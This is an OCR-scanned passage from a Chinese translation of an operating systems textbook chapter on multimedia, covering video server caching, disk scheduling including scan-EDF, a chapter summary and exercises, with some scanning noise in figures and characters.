否 进行 高 速 缓存 还 取决 于 它 要 被 高 速 缓存 多 长 时 间 以 及 内 存 有 多 紧张 。 这 里 应 该 使 用 不 同 的 策略 ， 而 不 
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是 将 所 有 磁盘 块 保留 在 高 速 缓存 之 中 并 且 在 高 速 缓存 被 填 满 之 后 淘汰 最 近 最 少 使 用 的 。 对 于 在 第 一 个 观 
众 之 后 AT 时 间 之 内 有 第 二 个 观众 的 每 一 部 电影 ， 可 以 将 其 标记 为 可 高 速 缓存 的 ， 并 且 高 速 缓存 其 所 有 磁 
级 块 直到 第 二 个 观众 〈 也 可 能 是 第 三 个 观众 ) 使 用 。 对 于 其 他 的 电影 ， 根 本 不 需要 进行 高 速 绥 存 。 

这 一 思想 还 可 以 进一步 发 挥 。 在 某 些 情况 下 合并 两 个 视频 流 是 可 行 的。 假设 两 个 用 户 正 在 观看 同一 
部 电影 ， 但 是 在 两 个 用 户 之 间 存 在 10 秒 钟 的 延迟 。 在 高 速 缓存 中 保留 10 秒 钟 的 磁盘 块 是 有 可 能 的 ， 但 是 
要 浪费 内 存 。 一 种 替代 的 方法 是 试图 使 两 部 电影 同步 ， 这 一 方法 可 以 通过 改变 两 部 电影 的 帧 率 实现 ， 图 
7-25 演 示 了 这 一 思想 。 
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图 7-25 а) 两 个 用 户 观 看 失 步 10 秒 钟 的 同一 部 电影 ，b) 将 两 个 视频 流 合并 为 一 个 


在 图 7-25a 中 ， 两 部 电影 均 以 每 分 钟 1800 帧 的 NTSC 速 率 播放 ， 由 于 用 户 2 开始 晚 了 10 秒 钟 ， 他 将 在 
整 部 电影 播放 过 程 中 落后 10 秒 钟 。 然 而 ， 在 图 7-25b 中 ， 当 用 户 2 到 来 时 ， 用 户 1 的 视频 流 将 放 慢 ， 在 接 
下 来 的 3 分 钟 里 ， 它 不 是 以 每 分 钟 1800 帧 的 速率 播放 ， 而 是 以 每 分 钟 1750 帧 的 速率 播放 ，3 分 钟 后 ， 它 正 
处 于 第 5550 帧 。 与 此 同时 ， 用 户 2 的 视频 流 在 最 初 的 3 分 钟 里 以 每 分 钟 1850 帧 的 速率 播放 ，3 分 钟 后 ， 它 
同样 也 处 于 第 5550 帧 。 从 此 刻 之 后 ， 两 个 视频 流 均 以 正常 速度 播放 。 

在 追赶 阶段 ， 用 户 1 的 视频 流 运行 速度 慢 了 2.8%， 而 用 户 2 的 视频 流 运行 速度 快 了 2.8%。 用 户 不 太 
可 能 会 注意 到 这 一 点 。 然 而 ， 如 果 对 此 有 所 担心 ， 那 么 追赶 阶段 可 以 在 比 3 分 钟 更 长 的 时 间 间隔 上 展开 。 

一 种 降低 一 个 用 户 的 速度 以 便 与 另 一 个 视频 流 合并 的 可 选 方法 是 ， 给 用 户 以 在 他 们 的 电影 中 包含 广 
告 的 选项 ， 与 无 广告 的 电影 相 比 ， 其 观看 价格 比较 低 。 用 户 还 可 以 选择 产品 门类 ， 这 样 广告 的 侵扰 就 会 
小 一 些 而 更 有 可 能 被 观看 。 通 过 对 广告 的 数目 、 长 度 和 时 间 安 排 进行 巧妙 的 操作 ， 视 频 流 就 可 以 被 阻 沼 
足够 长 的 时 间 ， 以 便 与 期 望 的 视频 流 取得 同步 (Krishnan，1999) 。 


7.8.2 文件 高 速 缓存 

在 多 媒体 系统 中 高 速 缓存 还 能 够 以 不 同 的 方式 提供 帮助 。 由 于 大 多 数 电影 都 非常 大 (3~6GB)， 视 
频 服务 器 通常 不 能 在 磁盘 上 存放 所 有 这 些 文件 ， 所 以 要 将 它们 存放 在 DVD 或 磁带 上 。 当 需要 一 部 电影 的 
时 候 ， 它 总 是 可 以 被 复制 到 磁盘 上 ， 但 是 存在 大 量 的 启动 时 间 来 查找 电影 并 将 其 复制 到 磁盘 上 。 因 此 ， 
大 多 数 视频 服务 器 维护 着 一 个 请 求 最 频繁 的 电影 的 磁盘 高 速 缓存 。 流 行 的 电影 将 完整 地 存放 在 磁盘 上 。 
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使 用 高 速 缓存 的 另 一 种 方法 是 在 磁盘 上 保存 每 部 电影 的 最 初 几 分 钟 。 这 样 ， 当 一 部 电影 被 请 求 时 
可 以 立刻 从 磁盘 文件 开始 回放 ， 与 此 同时 ， 电 影 从 DVD 或 磁带 复制 到 磁盘 上 。 通 过 始终 在 磁盘 上 存放 电 
影 足够 长 的 部 分 ， 电 影 的 下 一 个 片断 在 它 需要 之 前 就 已 经 取 到 磁盘 上 的 概率 会 很 高 。 如 果 一 切 都 进行 得 
很 好 ， 整 部 电影 将 在 它 需要 之 前 就 已 经 在 磁盘 上 了 ， 然 后 它 将 进入 高 速 缓存 并 且 停留 在 磁盘 上 以 备 随后 
有 更 多 的 请 求 。 如 果 太 多 的 时 间 过 去 而 没有 另外 的 请 求 ， 电 影 将 从 高 速 缓存 中 删除 ， 以 便 为 更 为 流行 的 
电影 腾 出 空间 。 


7.9 多 媒体 磁盘 调度 

多 媒体 对 磁盘 提出 了 与 传统 的 、 面 向 文本 的 应 用 程序 (例如 编译 器 或 字 处 理 器 ) 有 所 不 同 的 要 求 
特别 是 ， 多 媒体 要 求 极 高 的 数据 率 和 数据 的 实时 传输 。 这 些 都 不 是 轻易 就 能 够 提供 的 。 此 外 ， 在 视频 服 
务 器 的 情形 中 ， 让 一 个 服务 器 同时 处 理 几 千 个 客户 还 存在 着 经 济 压力 。 这 些 需 求 影响 着 整个 系统 。 上 面 
我 们 了 解 了 文件 系统 ， 现 在 让 我 们 来 看 一 看 多 媒体 磁盘 调度 。 


7.9.1 静态 磁盘 调度 

尽管 多 媒体 对 系统 的 所 有 部 分 提出 了 巨大 的 实时 和 数据 率 要 求 ， 但 是 它 还 有 一 个 特性 使 其 比 传统 的 
系统 更 加 容易 处 理 ， 这 就 是 可 预测 性 。 在 传统 的 操作 系统 中 ， 对 磁盘 块 的 请 求 是 以 相当 不 可 预测 的 方式 
发 出 的 。 磁 盘子 系统 所 能 做 的 最 好 不 过 是 对 于 每 个 打开 的 文件 执行 一 个 磁盘 块 的 预 读 ， 除 此 之 外 ， 它 能 
够 做 的 全 部 事情 就 是 等 待 请 求 的 到 来 ， 并 且 在 请 求 时 对 它们 进行 处 理 。 多 媒体 就 不 同 了 ， 每 个 活动 的 视 
频 流 对 系统 施加 明确 的 负载 ， 使 系统 成 为 高 度 可 预测 的 。 就 NTSC 回 放 而 言 ， 每 33.3ms， 每 个 客户 将 需 
要 其 文件 中 的 下 一 帧 ， 并 且 系统 有 33.3ms 的 时 间 提 供 所 有 的 帧 (系统 对 每 个 视频 流 需 要 缓冲 至 少 一 帧 
所 以 取 第 k + 1 帧 可 以 与 第 k 帧 的 回放 并 行 处 理 )。 

这 一 可 预测 的 负载 可 以 用 来 使 用 为 多 媒体 剪裁 的 算法 对 磁盘 进行 调度 。 下 面 我 们 将 只 考虑 一 个 磁盘 
但 是 其 思想 也 可 以 运用 于 多 个 磁盘 。 就 这 个 例子 而 言 ， 我 们 将 假设 存在 10 个 用 户 ， 每 个 用 户 观看 不 同 的 
电影 。 此 外 ， 我 们 还 将 假设 所 有 的 电影 具有 相同 的 分 辩 素 、 帧 率 和 其 他 特性 。 

根据 系统 的 其 他 部 分 ， 计 算 机 可 能 有 10 个 进程 ， 每 个 视频 流 一 个 进程 ， 或 者 有 一 个 具有 10 个 线程 的 
进程 ， 或 者 甚至 只 有 一 个 具有 一 个 线程 的 进程 ， 以 轮转 方式 处 理 10 个 视频 流 。 细 节 并 不 重要 ， 重 要 的 是 ， 
时 间 被 分 割 成 回环 (round)， 在 这 里 一 个 回环 是 一 帧 的 时 间 (对 于 NTSC 是 33.3ms， 对 于 PAL 是 40ms) 。 
在 每 一 回环 的 开始 ， 为 每 个 用 户 生成 一 个 磁盘 请 求 ， 如 图 7-26 所 示 。 


奇数 帧 的 缓冲 区 
偶数 帧 的 缓冲 区 


请 求 的 磁盘 块 707 92 281 130 326 40 160 466 204 524 


92 130 160 204 281 326 410 466 524 701 
磁盘 请 求 被 处 理 的 顺序 一 一 > 


图 7-26 在 一 个 回环 中 ， 每 部 电影 请 求 一 帧 


在 回环 的 起 始 处 ， 当 所 有 的 请 求 都 进来 之 后 ， 磁 盘 就 会 知道 在 那个 回环 期 间 它 必须 做 什么 ， 它 还 知 
道 直到 处 理 完 这 些 请 求 并 且 下 一 个 回环 开始 ， 不 会 有 其 他 的 请 求 进来 。 因 此 ， 它 能 够 以 优化 的 方法 对 请 
求 排序 ， 可 能 是 以 柱 面 顺序 (可 以 想象 在 某 些 情形 也 可 能 以 扇 区 顺序 ) 排序 ， 然 后 以 优化 的 顺序 对 它们 
进行 处 理 。 在 图 7-26 中 ， 显 示 的 请 求 是 以 柱 面 顺序 排序 的 。 

乍 一 看 ， 人 们 可 能 会 认为 以 这 样 的 方式 优化 磁盘 没有 什么 价值 ， 因 为 只 要 磁盘 满足 最 终 时 限 ， 那 么 
它 是 以 1ms 的 富余 满足 还 是 以 10ms 的 富余 满足 并 没有 什么 关系 。 然 而 ， 这 一 结论 是 错误 的 。 通 过 以 这 样 
的 方式 优化 寻 道 ， 处 理 每 一 请 求 的 平均 时 间 就 缩短 了 ， 这 意味 着 一 般 来 说 每 一 回环 磁盘 可 以 处 理 更 多 的 
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视频 流 。 换 句 话 说 ， 像 这 样 优化 磁盘 请 求 增加 了 服务 器 可 以 同时 传送 的 电影 数 。 回 环 末尾 的 富余 时 间 还 
可 以 用 来 服务 可 能 存在 的 任何 非 实时 请 求 。 

如 果 服 务 器 有 太 多 的 视频 流 ， 偶 尔 也 会 出 现 当 要 求 从 磁盘 的 边缘 部 分 读 取 帧 时 错过 了 最 终 时 限 的 情 
况 。 但 是 ， 只 要 错过 最 终 时 限 的 情况 足够 稀少 ,以 此 换取 同时 处 理 更 多 的 视频 流 还 是 可 以 容忍 的 。 注意， 
要紧 的 是 读 取 的 视频 流 的 数目 ， 每 个 视频 流 有 两 个 或 更 多 个 客户 并 不 影响 磁盘 性 能 或 调度 。 

为 了 保持 输出 给 客户 的 数据 流 运行 流畅 ， 在 服务 器 中 采用 双 缓冲 是 必要 的 。 在 第 ! 个 回环 期 间 ， 使 
用 一 组 缓冲 区 ， 每 个 视频 流 一 个 缓冲 区 。 在 这 个 回环 结束 的 时 候 ， 输 出 进程 或 进程 组 被 解除 阻塞 并 且 被 
告知 传输 第 1 帧 。 与 此 同时 ， 新 的 请 求 进来 请 求 每 部 电影 的 第 2 帧 (每 部 电影 或 许 有 一 个 磁盘 线程 和 一 个 
输出 线程 )。 这 些 请 求 必须 用 第 二 组 缓冲 区 来 满足 ， 因 为 第 一 组 缓冲 区 仍然 在 忙碌 中 。 当 第 3 个 回环 开始 
的 时 候 ， 第 一 组 缓冲 区 已 经 空间 ， 可 以 重新 用 来 读 取 第 3 帧 。 

我 们 一 直 在 假设 每 一 帧 只 有 一 个 回环 ， 这 一 限制 并 不 是 严格 必需 的 。 每 一 帧 也 可 以 有 两 个 回环 ， 以 
便 减 少 所 需 缓冲 区 空间 的 数量 ， 其 代价 是 磁盘 操作 的 次 数 增加 了 一 倍 。 类 似 地 ， 每 一 回环 可 以 从 磁盘 中 
读 取 两 帧 (假设 一 对 帧 连续 地 存放 在 磁盘 上 ) 。 这 一 设计 将 磁盘 操作 的 数目 减少 了 一 半 ， 其 代价 是 所 需 
缓冲 区 空间 的 数 基 增加 了 一 倍 。 依 靠 相对 可 利用 率 、 性 能 和 内 存 费用 与 磁盘 IO 的 对 比 ， 可 以 计算 并 使 
用 优化 策略 。 


7.9.2 动态 磁盘 调度 

在 上 面 的 例子 中 ， 我 们 假设 所 有 的 视频 流 具有 相同 的 分 状 素 、 帧 率 和 其 他 特性 ， 现 在 让 我 们 放弃 这 
-假设 。 不 同 的 电影 现在 可 能 具有 不 同 的 数据 率 ， 所 以 不 可 能 每 33.3ms 有 一 个 回环 并 且 为 每 个 视频 流 读 
取 一 帧 。 对 磁盘 的 请 求 或 多 或 少 是 随机 到 来 的 。 

每 一 读 请 求 需要 指定 要 读 的 是 哪 一 磁盘 块 ,另外 还 要 指定 什么 时 间 需 要 该 磁盘 块 ， 也 就 是 最 终 时 限 。 
为 简单 起 见 ， 我 们 假设 对 于 每 次 请 求实 际 的 服务 时 间 是 相同 的 尽管 这 肯定 是 不 真实 的 )。 以 这 种 方法 ， 
我 们 可 以 从 每 次 请 求 减 去 固定 的 服务 时 间 ， 得 到 请 求 能 够 发 出 并 且 还 能 满足 最 终 时 限 的 最 近 的 时 间 。 因 
为 磁盘 调度 程序 所 关心 的 是 对 请 求 进行 调度 的 最 终 时 限 ， 所 以 这 样 做 使 模型 更 为 简洁 。 

当 系统 启动 的 时 候 ， 还 没有 挂 起 的 磁盘 请 求 。 当 第 一 个 请 求 到 来 的 时 候 ， 它 立即 得 到 服务 。 当 第 一 
次 寻 道 发 生 的 时 候 ， 其 他 请 求 可 能 到 来 ， 所 以 当 第 一 次 请 求 结束 的 时 候 ， 磁盘 驱动 器 可 能 要 选择 下 一 次 
处 理 哪个 请 求 。 某 个 请 求 被 选中 并 开始 得 到 处 理 。 当 该 请 求 结束 的 时 候 ， 再 一 次 有 一 组 可 能 的 请 求 : E 
们 是 第 一 次 没有 被 选中 的 请 求 和 第 二 个 请 求 正在 被 处 理 的 时 候 新 到 来 的 请 求 。 一 般 而 言 只 要 一 个 磁盘 
请 求 完成 ， 磁 级 驱动 器 就 有 若干 组 挂 起 的 请 求 ， 必 须 从 中 做 出 选择 。 问 题 是 ， “使 用 什么 算法 选择 下 一 
个 要 服务 的 请 求 ?” 

在 选择 下 一 个 磁盘 请 求 时 ， 有 两 个 因素 起 着 重要 的 作用 : 最终 时 限 和 柱 面 。 从 性 能 的 观点 来 看 ， 保 
持 请 求 存放 在 柱 面 上 并 且 使 用 电梯 算法 可 以 将 总 寻 道 时 间 最 小 化 ， 但 是 可 能 导致 存放 在 边缘 柱 面 上 的 请 
求 错过 其 最 终 时 限 。 从 实时 的 观点 来 看 ， 将 请 求 按照 最 终 时 限 排序 并 且 以 最 终 时 限 的 顺序 对 它们 进行 处 
理 ， 可 以 将 错过 最 终 时 限 的 机 会 最 小 化 ， 但 是 可 能 增加 总 寻 道 时 间 。 

使 用 scan-EDF 算 法 (scan-EDF algorithm) (Reddy 和 Wyllie，1994) 可 以 将 这 两 个 因素 结合 起 来 。 
这 一 算法 的 思想 是 ， 将 最 终 时 限 比较 接近 的 请 求 收集 在 一 起 分 成 若干 批 ， 并 且 以 柱 面 的 顺序 对 其 进行 处 
理 。 作 为 一 个 例子 ， 我 们 考虑 图 7-27 当 + = 700 时 的 情形 。 磁 盘 驱动 器 知道 它 有 11 个 挂 起 的 请 求 ， 这 些 请 
求 具有 不 同 的 最 终 时 限 和 不 同 的 柱 面 。 它 可 以 决定 将 具有 最 早 的 最 终 时 限 的 5 个 请 求 视 为 一 批 ， 将 它们 
按照 柱 面 号 排序 ， 并 且 使 用 电梯 算法 以 柱 面 顺 序 对 它们 进行 服务 。 于 是 ， 顺 序 将 是 110、330、 440、676 
和 680。 只 要 每 个 请 求 能 够 在 其 最 终 时 限 之 前 完成 ， 这 些 请 求 就 可 以 安全 地 重新 排列 ， 从 而 将 所 需 的 总 
寻 道 时 间 最 小 化 。 

如 果 不 同 的 视频 流 具有 不 同 的 数据 率 ， 那么 当 一 个 新 的 客户 出 现时 将 引起 一 个 严重 的 问题 ， 该 客户 
是 否 应 该 被 接纳 ?如 果 接纳 该 客户 会 导致 其 他 的 视频 流 频 繁 地 错过 它们 的 最 终 时 限 ， 那么 答案 可 能 就 是 
否 。 存 在 两 种 方法 计算 是 否 接纳 新 的 客户 。 一 种 方法 是 假设 每 个 客户 平均 地 需要 某 些 数量 的 资源 ， 如 磁 
盘 带 宽 、 内 存 缓冲 区 、CPU 时 间 等 。 如 果 剩 下 的 每 一 资源 对 于 一 个 平均 的 顾客 来 说 都 是 足够 的 ， 则 接纳 
新 的 客户 。 
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另 一 种 算法 更 为 复杂 。 它 要 关注 新 顾客 想 要 看 的 特定 的 电影 ， 查 找 该 电影 的 《预先 计算 的 ) 数据 率 ， 
而 对 于 黑白 片 和 彩色 片 、 卡 通 片 和 故事 片 、 爱 情 片 和 战争 片 ， 数 据 率 都 不 相同 。 爱 情 片 运动 缓慢 ， 具 有 
较 长 的 场景 和 缓慢 的 淡 人 谈 出， 所 有 这 些 都 会 充分 得 到 压缩 ， 而 战争 片 具有 许多 快速 的 切换 和 迅速 的 运 
动 ， 因 此 具有 许多 ! 帧 和 较 大 的 P 帧 。 如 果 服务 器 对 于 新 客户 想 要 看 的 电影 而 言 具有 足够 的 容量 ， 那 么 就 
准许 接纳 ， 否 则 就 拒绝 接纳 。 
ачи 请 求 (按照 最 终 时 限 排序 ) 
се| no ою мо 2 оо тв зо ae 103 


Е еттт ||| 


全 
700 70 720 730 740 750 
最 终 时 限 (ms) 一 > 

图 7-27 scan-EDF 算 法 使 用 最 终 时 限 和 柱 面 号 进行 调度 


710 有 关 多 媒体 的 研究 

多 媒体 是 近 些 年 的 热门 课题 , 所 以 有 相当 多 数量 关于 多 媒体 的 研究 。 这 些 研究 中 有 许多 是 关于 内 容 、 
构造 工具 和 应 用 的 ， 而 这 些 都 超出 了 本 书 的 范围 。 另 一 个 热门 领域 是 多 媒体 与 网 络 ， 这 也 超出 了 本 书 范 
围 。 但 是 关于 多 媒体 服务 器 的 研究 ， 尤 其 是 分 布 式 服务 器 与 操作 系统 是 相关 的 (Sarhan 和 Das， 2004, 
Matthur 和 Mundur, 2004，Zaia 等 人 ，2004) ， 支 持 多 媒体 的 文件 系统 也 是 与 操作 系统 相关 的 研究 (Ahn 
等 人 ，2004，Cheng 等 人 ，2005，Kang 等 人 ，2006，Park 和 Ohm，2006) 。 

优秀 的 音频 和 视频 编码 (尤其 是 3D 应 用 ) 对 于 高 性 能 是 很 关键 的 。 因 此 ， 这 些 课题 也 引起 了 相当 
程度 的 关注 (Chattopadhyay 等 人 ，2006，Hari 等 人 ，2006，Kum 和 Mayer-Patel.2006) 。 

服务 质量 对 多 媒体 系统 非常 重要 ， 所 以 吸引 了 相当 的 关注 (Childs 和 Ingram，2001，Tamai 等 人 ， 
2004)。 与 服务 质量 有 关 的 还 有 调度 ， 以 及 CPU (Etsion 等 人 ，2004，Etsion Л, 2006; Nieh 和 Lam,， 
2003，Yuan 和 Nahrstedt，2006) 和 硬盘 (Lund 和 Goebel，2003; Reddy 等 人 ，2005) 。 

在 为 付费 客户 提供 多 媒体 广播 编排 服务 时 ， 安 全 就 变 得 很 重要 了 ， 所 以 这 个 课题 也 受到 了 关注 
Barni, 2006, 


7.11 小 结 


多 媒体 是 一 种 非常 有 前 途 的 计算 机 应 用 。 由 于 多 媒体 文件 的 巨大 和 苛刻 的 实时 回放 要 求 ， 为 文本 而 
设计 的 操作 系统 对 于 多 媒体 而 言 不 是 最 理想 的 。 多 媒体 文件 包含 多 重 平行 的 轨迹 ， 通 常 有 一 个 视频 轨迹 
和 至 少 一 个 音频 轨迹 ， 有 时 还 有 一 些 字幕 轨迹 。 在 回放 期 间 ， 这 些 轨迹 都 必须 保持 同步 。 

音频 通过 周期 性 地 对 音量 进行 采样 而 得 以 记录 下 来 ， 通 常 每 秒 采样 44 100 次 (针对 CD 质量 的 声音 )。 压 
缩 可 以 应 用 于 音频 信号 ， 得 到 大 约 10 倍 的 均匀 的 压缩 率 。 视 频 压缩 可 以 使 用 帧 内 压缩 (РЕС), 也 可 以 使 用 
帧 间 压 缩 (MPEG)。 后 者 将 P 帧 表示 为 与 前 一 帧 的 差 ， 而 B 帧 则 既 可 以 基于 前 面 的 帧 ， 也 可 以 基于 后 面 的 帧 。 

多 媒体 需要 实时 调度 以 便 满 足 其 最 终 时 限 。 通 常 使 用 的 算法 有 两 个 。 第 一 个 算法 是 速率 单调 调度 ， 
它 是 一 个 静态 抢先 算法 ， 它 根据 进程 的 周期 将 固定 的 优先 级 分 配给 进程 。 第 二 个 算法 是 最 早 最 终 时 限 优 
先 调度 ， 它 是 一 个 动态 算法 ， 总 是 选择 具有 最 近 最 终 时 限 的 进程 。 EDF 更 复杂 一 些 ， 但 是 它 可 以 达到 
100% 的 利用 率 ， 而 RMS 有 时 不 能 达到 。 

多 媒体 文件 系统 通常 使 用 推送 型 模型 而 不 是 拉 取 型 模型 。 一 旦 开始 一 个 视频 流 ， 则 数据 位 就 从 服务 器 不 断 流 
出 而 不 需要 用 户 进一步 请 求 。 这 一 方法 从 根本 上 不 同 于 常规 的 操作 系统 ， 但 是 为 了 满足 实时 要 求 这 样 做 是 必要 的 。 

文件 可 以 连续 存放 也 可 以 不 连续 存放 。 在 后 一 种 情况 下 ， 存 储 单位 可 以 是 可 变 长 度 的 《一 个 磁盘 块 
是 一 帧 )， 也 可 以 是 固定 长 度 的 (一 个 磁盘 块 是 多 个 帧 )。 这 些 方法 具有 不 同 的 权衡 。 

磁盘 上 文件 的 存放 格局 影响 着 系统 的 性 能 。 当 存在 多 个 文件 时 ， 有 时 使 用 风琴 管 算法 。 横 跨 多 个 磁 
盘 将 文件 分 成 条 带 〈 无 论 是 宽 条 带 还 是 窗 条 带 ) 也 是 常用 的 。 为 了 改进 性 能 ， 磁盘 块 与 文件 高 速 缓存 策 
略 也 得 到 了 广泛 的 利用 。 
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习题 


1. 未 压缩 的 黑白 NTSC 电 视 能 否 通过 快速 以 太 网 发 
送 ? 如 果 可 以 的 话 ， 同 时 可 以 发 送 多 少 个 频道 ? 
2.HDTYV 的 水 平分 辩 率 是 常规 电视 的 两 倍 (1280 
像素 对 640 像 素 ) 。 利 用 正文 中 提供 的 信息 ， 它 

需要 的 带宽 比 标准 电视 多 多 少 ? 

3. 在 图 7-3 中 , 对 于 快 进 和 快 倒 存在 着 单独 的 文件 。 
如 果 一 台 视 频 服务 器 还 打算 支持 慢 动作 ， 那 么 
对 于 前 进 方向 的 慢 动作 是 否 需要 另 一 个 文件 ? 
后 倒 的 方向 如 何 ? 

4. 声音 信号 用 16 位 有 符号 数 (1 个 符号 位 ，15 个 数 
值 位 ) 采样 。 以 百分比 表示 的 最 大 量化 噪声 是 
多 少 ? 对 于 长 第 协奏曲 或 摇滚 音乐 这 是 不 是 一 
个 大 问题 ， 或 者 对 于 两 者 是 不 是 问题 相同 ? 请 
解释 你 的 答案 。 

5. 唱 片 公司 能 够 使 用 20 位 采样 制作 数字 唱片 的 母 
片 ， 最 终 发 行 给 听众 的 唱片 使 用 的 是 16 位 采样 。 
请 提出 一 种 方法 来 碱 少量 化 噪声 的 影响 ， 并 讨 
论 你 的 方案 的 优点 和 缺点 。 

6. DCT 变 换 使 用 8 х 8 的 块 ， 但 是 用 于 运动 补偿 的 
算法 使 用 16 x 16 的 块 。 这 一 差异 是 否 会 导致 问 
题 ? 如果 是 的 话 ， 在 MPEG 中 这 个 问题 是 怎样 
解决 的 ? 

7. 在 图 7-10 中 ， 我 们 看 到 对 于 静止 的 背景 和 运动 
角色 MPEG 是 如 何 工作 的 。 假 设 一 个 MPEG 视 频 
是 由 这 样 的 场景 制作 的 : 在 该 场景 中 摄像 机 被 
安装 在 一 个 三 脚 架 上 并 且 从 左 到 右 摇动 镜头 ， 
摇动 的 速度 使 得 没有 两 幅 连 续 的 帧 是 相同 的 。 
现在 是 不 是 所 有 的 帧 都 必须 是 I 帧 ?为 什么 ? 

8. 假设 图 7-13 中 的 三 个 进程 中 的 每 个 进程 都 伴随 
一 个 进程 ， 该 进程 支持 一 个 音频 流 按照 与 视频 
进程 相同 的 周期 播放 ， 那 么 音频 缓冲 区 可 以 在 
视频 帧 之 间 得 到 更 新 。 所 有 这 三 个 音频 进程 都 
是 完全 相同 的 。 对 于 一 个 音频 进程 的 每 一 次 突 
发 ， 有 多 少 可 用 的 CPU 时 间 ? 

9. 两 个 实时 进程 在 一 台 计 算 机 上 运行 ， 第 一 个 进 
程 每 25ms 运 行 10ms， 第 二 个 进程 每 40ms 运 行 
15ms。RMS 对 于 它们 是 否 总 是 起 作用 ? 

10. 一 台 视 频 服务 器 的 CPU 利 用 率 是 65%。 采 用 
RMS 调 度 该 服务 器 可 以 放映 多 少 部 电影 ? 

11. 在 图 7-15 中 ，EDF 算 法 保持 CPU 100% 人 忙碌 直 
到 ! = 150 的 时 刻 ， 它 不 能 保持 CPU 无 限期 地 信 
碌 ， 因 为 CPU 每 秒 只 有 975ms 的 工作 要 做 。 扩 
展 该 图 到 150ms 之 后 并 确定 采用 EDF 算 法 CPU 
何 时 首次 变 为 空闲 。 

12. DVD 可 以 保存 足够 的 数据 用 于 全 长 的 电影 并 
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且 传输 率 足 够 显示 电视 质量 的 节目 。 为 什么 视 
频 服务 器 不 采用 许多 DVD 驱动 器 的 ”储存 库 ” 
作为 数据 源 ? 


“近似 视频 点 播 系统 的 操作 员 发 现 某 个 城市 的 人 们 


不 愿意 为 电影 开始 而 等 待 超过 6 分 钟 的 时 间 。 对 于 
一 部 3 小 时 的 电影 ， 需 要 多 少 个 并 行 的 数据 流 ? 


- 考虑 一 个 采用 Abram-Profeta 与 Shin 提 出 的 方法 


的 系统 ， 在 这 个 系统 中 视频 服务 器 操作 员 希 望 
客户 能 够 完全 在 本 地 向 前 或 向 后 搜索 1 分 钟 。 
假设 视频 流 是 速率 为 4 Mbps 的 MPEG-2， 每 个 
客户 在 本 地 必须 有 多 大 的 缓冲 区 空间 ? 


- 考虑 Abam-Profeta 和 Shin 方 法 。 如 果 用 户 用 大 


小 为 50MB 的 RAM 用 来 缓冲 ， 那 么 一 个 2Mbps 
的 视频 流 的 AT 是 多 少 ? 

一 个 HDTV 视频 点 播 系统 使 用 图 7-20a 的 小 块 模 
型 ， 磁盘 块 大 小 为 IKB。 如 果 视 频 分 辩 率 为 
1280 x 720 并 且 数 据 流速 率 为 12 Mbps， 那 么 
在 一 部 采用 NTSC 制 式 的 2 小 时 长 的 电影 中 有 多 
少 磁盘 空间 浪费 在 内 部 碎片 上 ? 


“针对 NTSC 和 PAL 思 考 图 7-20a 的 存储 分 配方 


法 。 对 于 给 定 的 磁盘 块 和 影片 大 小 ， 是 否 一 种 
制式 比 另 一 种 制式 具有 更 多 的 内 部 碎片 ”如果 
是 的 话 ， 哪 一 种 制式 要 好 一 些 ? 为 什么 ? 


- 考虑 图 7-20 所 示 的 两 种 选择 。 向 HDTV 的 转换 


是 否 更 有 利于 其 中 的 一 种 系统 ? 请 讨论 。 


.考虑 一 个 系统 ， 它 有 2KB 磁 盘 块 ， 能 存储 2 小 


时 的 PAL 制 电影 ， 平 均 每 帧 16KB。 那 么 用 小 
磁盘 块 存储 方法 平均 浪费 空间 是 多 少 ? 

上 例 中 ， 如 果 每 帧 项 需要 8 字 节 ， 其 中 有 1 字 节 
用 来 指示 每 帧 的 磁盘 块 号 ， 那 么 可 能 存储 的 最 
长 的 电影 大 小 是 多 少 ? 


- 当 每 一 个 帧 集合 的 大 小 相同 时 ，Chen 与 Thapar 


的 近似 视频 点 播 方法 工作 得 最 为 出 色 。 假 设 一 
部 电影 正在 用 同时 发 出 的 24 个 数据 流 播放 ， 并 
且 10 帧 中 有 1 帧 是 I 帧 。 再 假设 [ 帧 的 大 小 是 P 帧 
的 10 倍 ，B 帧 的 大 小 与 P 帧 相同 。 一 个 等 于 4 个 
帧 和 20 个 P 帧 的 缓冲 区 不 够 大 的 概率 是 多 少 ? 
你 认为 这 样 的 一 个 缓冲 区 大 小 是 可 接受 的 吗 ? 
为 了 使 问题 易于 处 理 ， 假 设 在 数据 流 中 帧 的 类 
型 是 随机 且 独 立 分 布 的 。 

对 于 Chen 和 Thapar 方 法 ， 假 设 有 5 个 轨道 需要 
8I- 帧 ，35 个 轨道 需要 5I- 帧 ，45 个 轨道 需要 31- 
帧 ，15 个 帧 从 1 到 2 帧 中 选择 ， 如 果 我 们 想 保证 
9%5 帧 能 被 缓冲 器 容纳 ， 那 么 缓冲 器 的 大 小 应 访 
是 多 少 ? 
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23. 对 于 Chen 和 Thapar 方 法 ， 假 定 有 一 个 用 PAL 制 
格式 编码 的 3 小 时 电影 ， 需 要 在 每 个 15 分 钟 内 
流出 。 那 么 需要 多 少 个 并 发 流 ? 

24. 图 7-18 的 最 终结 果 是 播放 点 不 再 处 于 缓冲 区 的 

中 间 。 设 计 一 个 方案 ， 最 少 在 播放 点 之 后 有 5 

分 钟 并 且 在 播放 点 之 前 有 5 分 钟 。 你 可 以 做 出 

任何 合理 的 假设 ， 但 是 陈述 要 清楚 。 

.图 7-19 的 设计 要 求 所 有 语言 轨迹 在 每 一 帧 上 读 

出 。 假 设 视频 服务 器 的 设计 者 必须 支持 大 量 的 

语言 ， 但 是 不 想 将 这 么 多 的 RAM 投 入 给 缓冲 

区 以 保存 每 一 帧 。 其 他 可 利用 的 选择 是 什么 ? 

每 一 种 选择 的 优点 和 缺点 是 什么 ? 

.一 台 小 的 视频 服务 器 具有 8 部 电影 。 对 于 最 流 

行 的 电影 、 第 二 流行 的 电影 ， 直 到 最 不 流行 的 

电影 ，Zipf 定 律 预 测 的 概率 是 多 少 ? 

27. 一 块 具 有 1000 个 柱 面 的 14GB 的 磁盘 用 于 保存 
以 4 Mbps 速 率 流动 的 1000 个 30 秒 的 MPEG-2 视 
频 剪 辑 。 这 些 视频 剪辑 根据 管 风 和 琴 算 法 存放 。 
依照 Zipf 定 律 ， 磁 盘 臂 花 在 中 间 10 个 柱 面 的 时 
间 比 例 是 多 少 ? 

28. 假设 对 于 影片 A、B、C 和 D 的 相对 需求 由 Zipf 定 

律 所 描述 ， 对 于 如 图 7-24 中 所 示 的 四 种 划分 条 带 

的 方法 ， 四 块 磁盘 的 期 望 相对 利用 率 是 多 少 ? 

:两 个 视频 点 播客 户 相隔 6 秒 钟 开始 观看 同一 部 

PAL 电 影 。 如 果 系 统 加 快 一 个 数据 流 并 且 减 慢 

